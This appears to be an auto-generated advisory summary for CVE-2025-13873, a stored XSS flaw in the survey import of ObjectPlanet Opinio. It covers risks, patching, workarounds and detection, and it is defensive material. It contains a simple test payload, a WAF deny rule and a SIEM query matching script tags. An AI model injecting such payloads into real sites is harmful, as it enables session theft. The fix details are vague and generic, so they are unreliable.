CVE-2025-13873
📋 TL;DR
This stored XSS vulnerability in ObjectPlanet Opinio's survey-import feature allows attackers to inject malicious JavaScript that executes when users view compromised surveys. It affects web applications running Opinio 7.26 rev12562, potentially compromising user sessions and data.
💻 Affected Systems
- ObjectPlanet Opinio
📦 What is this software?
Opinio by Objectplanet
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, perform actions as authenticated users, or install malware through drive-by downloads.
Likely Case
Session hijacking, credential theft, defacement of survey pages, and data exfiltration from users accessing compromised surveys.
If Mitigated
Limited impact if proper input validation and output encoding are implemented, though some functionality disruption may occur.
🎯 Exploit Status
Requires access to survey-import functionality; exploitation is straightforward once access is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor changelog for specific fixed version
Vendor Advisory: https://www.objectplanet.com/opinio/changelog.html
Restart Required: Yes
Instructions:
1. Check current Opinio version. 2. Download latest version from ObjectPlanet. 3. Backup current installation. 4. Apply update following vendor instructions. 5. Restart web application service.
🔧 Temporary Workarounds
Disable survey-import feature
allTemporarily disable or restrict access to the vulnerable survey-import functionality
# Configure web server to block access to import endpoints
# Modify application permissions to restrict import feature
Implement WAF rules
allAdd web application firewall rules to detect and block XSS payloads in survey imports
# Example mod_security rule: SecRule ARGS "<script" "id:1001,phase:2,deny"
🧯 If You Can't Patch
- Implement strict input validation and output encoding for all survey import data
- Enable Content Security Policy (CSP) headers to restrict script execution
🔍 How to Verify
Check if Vulnerable:
Test survey-import feature with XSS payloads like <script>alert('test')</script> and check if script executes when viewing imported surveyCheck Version:
# Check Opinio version in admin interface or application configuration filesVerify Fix Applied:
After patching, repeat XSS test payloads to confirm they are properly sanitized and don't execute📡 Detection & Monitoring
Log Indicators:
- Unusual survey import activity
- HTTP requests containing script tags or JavaScript in POST data
- Multiple failed import attempts
Network Indicators:
- POST requests to survey import endpoints with suspicious payloads
- Outbound connections to unknown domains after survey access
SIEM Query:
source="web_server" AND (uri="/survey/import" OR method="POST") AND (content="<script" OR content="javascript:")